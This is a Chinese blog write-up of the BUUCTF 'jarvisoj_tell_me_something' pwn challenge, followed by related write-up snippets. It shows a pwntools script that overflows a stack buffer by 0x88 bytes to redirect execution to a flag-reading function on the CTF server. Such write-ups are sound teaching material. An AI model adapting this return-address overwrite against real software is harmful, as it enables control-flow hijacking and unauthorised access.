BUUCTF-jarvisoj_tell_me_something

最新推荐文章于 2025-01-21 19:30:26 发布

原创最新推荐文章于 2025-01-21 19:30:26 发布 · 198 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#pwn #linux

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

本文介绍了一种栈溢出漏洞的利用方法，通过具体案例展示了如何使用checksec和IDA等工具进行分析，并通过编写EXP脚本来实现栈溢出攻击，最终获取目标系统的敏感信息。

1.checksec

2.IDA

read有栈溢出

flag.txt

进行栈溢出将返回地址覆盖为fopen函数地址

3.EXP

from pwn import *

r=remote("node4.buuoj.cn",25237)
flag_addr=0x400620

payload='a'*(0x88)+p64(flag_addr)
r.sendline(payload)

r.interactive()

题目很简单,分析也不难

就是需要注意一点,偏移不需要加上rbp的8个字节

没有push rbp的操作,所以不用加8字节,需要注意这一点

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF pwn——jarvisoj_tell_me_something

CNS-Enterprise BCC-1701-J

04-17

259

BUUCTF 做题练习

[BUUCTF]PWN——jarvisoj_tell_me_something

mcmuyanga的博客

11-02

408

jarvisoj_tell_me_something 附件步骤：例行检查，64位程序，开启了NX保护运行一下程序，看看程序的大概流程 64位ida载入，shift+f12检索程序里的字符串看到了flag.txt关键子，双击跟进，找到了程序里的后门，flag_addr=0x400620 从main函数开始看程序输入点的v4明显的溢出漏洞，利用它覆盖返回地址为flag_addr的地址读出flag 这边有一个注意点看汇编发现这个程序的结尾处跟平常函数的结尾不一样没有leave 这道题

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF：jarvisoj_tell_me_something（write up）

qq_44768749的博客

08-24

665

BUUCTF：jarvisoj_tell_me_something0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析仅开启了栈不可执行保护 0x02 运行只是输入一条message 0x03 IDA good_game函数将flag.txt内容输出 0x04 思路是一道简单的栈溢出题，知道覆盖长度即可，gdb调试发现输入message的地址到返回地址的长度为0x88字节 0x05 exp #!/usr/bin/python

BUUCTF jarvisoj_tell_me_something

2401_88087539的博客

01-21

317

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

jarvisoj_tell_me_something【BUUCTF】

qq_41696518的博客

09-03

293

那就很简单了，溢出指向漏洞函数即可，但此题有个小坑，其实最开始学pwn时会通过gdb查找溢出大小，但后面懒了就直接通过IDA查看，但IDA并不一定准确，并且题目本身也会有坑，比如该题。但本题，main函数没有push ebp的操作，所有溢出时不需要多加8字节ebp位置。

jarvisoj_tell_me_something

小白垃圾笔记2

05-22

161

我在调试的时候并没有发现ebp，我用python生成了0x88个字符后，有手动输入了8个a。还好听了师傅的话，每次打之前确定下ida是否判断的正确。这个的话，输入0x88个字符后，后边就是返回地址。查找字符串后ctrl+x找到函数所在地址。意思就是0x88个字符后就是返回地址了。小白垃圾做题笔记，不及建议阅读。

java写的网络围棋程序 .rar

10-30

java写的网络围棋程序,使用java 的网络编程的一个系统

buuctf jarvisoj_tell_me_something

carol2358的博客

05-04

267

水题，栈溢出返回到good_game就行了，要注意这题没有bp from pwn import * from LibcSearcher import * local_file = './guestbook' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select ...

jarvisoj——Tell Me Something

王嘟嘟的博客

07-14

743

本来想做其他的平台，但是搜了一下还是这个平台比较适合入门。题目 Wp 这里首先下载，然后ida打开，看到main函数 main函数说的实际上就是有一个保存的栈大小为136，但是确允许输入256栈大小的内容，这里存在栈溢出的问题。然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。那么需要做的就是先覆盖，这里我自己感觉的是，覆盖先将自身拉满，然后加返回地址直接覆盖就行。最后就是先覆盖136的自身，然后加上good_game的地址即可。 pwntools fro

Jarvis OJ Tell Me Something

九层台

04-05

1035

nc pwn.jarvisoj.com 9876 题目网址 https://www.jarvisoj.com/challenges 需要原料： python zio模块。拿到程序名字太长了，改名成 1 用file命令查看文件类型 file 1 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically...

[Jarvis OJ - PWN]——Tell Me Something

Y_peak的博客

02-02

377

[Jarvis OJ - PWN]——Tell Me Something 题目地址：https://www.jarvisoj.com/challenges 题目：

buuoj jarvisoj_tell_me_something

pondzhang的专栏

03-26

224

main函数： int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v4; // [rsp+0h] [rbp-88h] write(1, "Input your message:\n", 0x14uLL); read(0, &v4, 0x100uLL); return wri...

Jarvis oj tell me something writeup

ditto的博客

12-31

316

拿到题目前checksec下： 64位，开启了NX。放到IDA里看下：就单纯的栈溢出，看下调用哪些函数： plt表里并没有system函数，也不知道对方使用的动态库的版本。看到函数good_game: 这个函数会读取flag，那么就很显然了，将返回地址覆盖到这个函数即可。计算下溢出点：由于是64位的程序，不能访问大于0x00007fffffffffff的地址空间。但是可以通...

Buuctf(pwn) jarvisoj_tell_me_something 栈溢出

半岛铁盒的博客

08-15

210

64位程序，开启了NX保护 400620 from pwn import * r=remote('node4.buuoj.cn',29273) flag_addr=0x400620 payload='a'*(0x88)+p64(flag_addr) r.sendline(payload) r.interactive() 这道题需要注意的一点是没有返回这是其栈结构所以这道题直接溢出0x88即可 ...

【jarvisoj刷题之旅】pwn题目Tell Me Something的writeup

iqiqiya的博客

10-14

1147

题目信息： file一下发现是64位的ELF checksec检查下安全性 objdump -t 文件名可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...

jarvisoj_tell_me_something 1

最新发布

07-22

### 漏洞分析与利用方式在 `jarvisoj_tell_me_something` 这道题目中，程序是一个 64 位的可执行文件，并且开启了 NX（No-eXecute）保护，这意味着栈上数据不能直接执行，攻击者无法直接注入 shellcode 到栈上执行。然而，程序中存在一个明显的栈溢出漏洞，这使得攻击者可以通过覆盖返回地址来控制程序执行流程[^1]。程序的主要漏洞位于 `main` 函数中，变量 `v4` 是一个 64 位的局部变量，位于栈上。通过 `read` 函数向该变量读取了 0x100（256）字节的数据，而 `v4` 本身的大小仅为 8 字节。因此，这种不匹配会导致栈上的返回地址被覆盖，从而实现控制流劫持[^3]。 ### 利用方式题目中存在一个后门函数 `good_game()`，该函数会尝试打开 `flag.txt` 文件，这意味着如果能够将程序的执行流跳转到该函数地址，就可以读取到 flag 文件内容[^1]。在利用过程中，构造的 payload 由两部分组成： 1. **填充部分**：使用 `'A'` 或其他字符填充至 0x88 字节，以覆盖栈上的局部变量和保存的寄存器。 2. **地址覆盖部分**：将 `good_game()` 函数的地址以小端序格式写入栈上，覆盖返回地址。最终的 payload 结构如下： ```python payload = b'A' * 0x88 + p64(good_game_addr) ``` ### EXP 示例以下是一个典型的利用脚本示例，使用 `pwntools` 库进行远程连接和 payload 发送： ```python from pwn import * # 连接到远程服务器 r = remote("node4.buuoj.cn", 28428) # 获取 good_game 函数的地址 good_game_addr = 0x400620 # 构造 payload payload = b'A' * 0x88 + p64(good_game_addr) # 发送 payload r.sendline(payload) # 进入交互模式，查看 flag r.interactive() ``` ### 注意事项 1. **IDA 分析的准确性**：虽然 IDA 可以帮助快速定位溢出点和函数地址，但在某些情况下，IDA 的分析可能会与实际运行环境存在差异。例如，`main` 函数中没有 `push rbp` 操作，因此不需要额外填充 8 字节来覆盖保存的 `rbp` 值[^4]。 2. **远程连接问题**：不同题目实例的端口号可能不同，确保使用正确的 IP 和端口进行连接。 3. **环境一致性**：在本地测试时，可以使用 `process` 函数启动本地进程，但在提交时应切换为 `remote` 连接。 ###